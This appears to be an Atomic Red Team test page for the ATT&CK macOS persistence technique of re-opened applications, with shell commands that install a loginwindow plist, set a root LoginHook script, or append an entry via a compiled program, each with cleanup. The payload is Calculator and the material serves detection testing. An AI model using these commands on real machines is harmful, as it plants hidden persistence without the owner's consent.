Try it using Invoke-Atomic

Boot or Logon Autostart Execution: Re-opened Applications

Description from ATT&CK

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish Persistence by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.

Atomic Tests

Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications

Copy in new loginwindow.plist to launch Calculator.

Supported Platforms: macos

auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba

Inputs:

Name Description Type Default Value
calc_plist_path path to binary plist with entry to open calculator Path PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist

Attack Commands: Run with sh!

1
2
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist

Cleanup Commands:

1
2
rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist

Atomic Test #2 - Re-Opened Applications using LoginHook

Mac Defaults

Reference

Supported Platforms: macos

auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb

Inputs:

Name Description Type Default Value
script path to script Path /path/to/script

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
sudo defaults write com.apple.loginwindow LoginHook #{script}

Cleanup Commands:

1
2
sudo defaults delete com.apple.loginwindow LoginHook

Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications

Appends an entry to launch Calculator hidden loginwindow.*.plist for next login. Note that the change may not result in the added Calculator program launching on next user login. It may depend on which version of macOS you are running on.

Supported Platforms: macos

auto_generated_guid: 766b6c3c-9353-4033-8b7e-38b309fa3a93

Inputs:

Name Description Type Default Value
objc_source_path path to objective C program Path PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m
exe_path path to compiled program Path /tmp/t1547007_append_exe

Attack Commands: Run with sh!

1
2
3
4
5
6
7
8
9
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}

Cleanup Commands:

1
2
3
4
5
6
7
8
rm -f #{exe_path}
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then
   exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}

Dependencies: Run with bash!

Description: compile C program

Check Prereq Commands:

1
2
if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi

Get Prereq Commands:

1
2
cc #{objc_source_path} -o #{exe_path} -framework Cocoa

source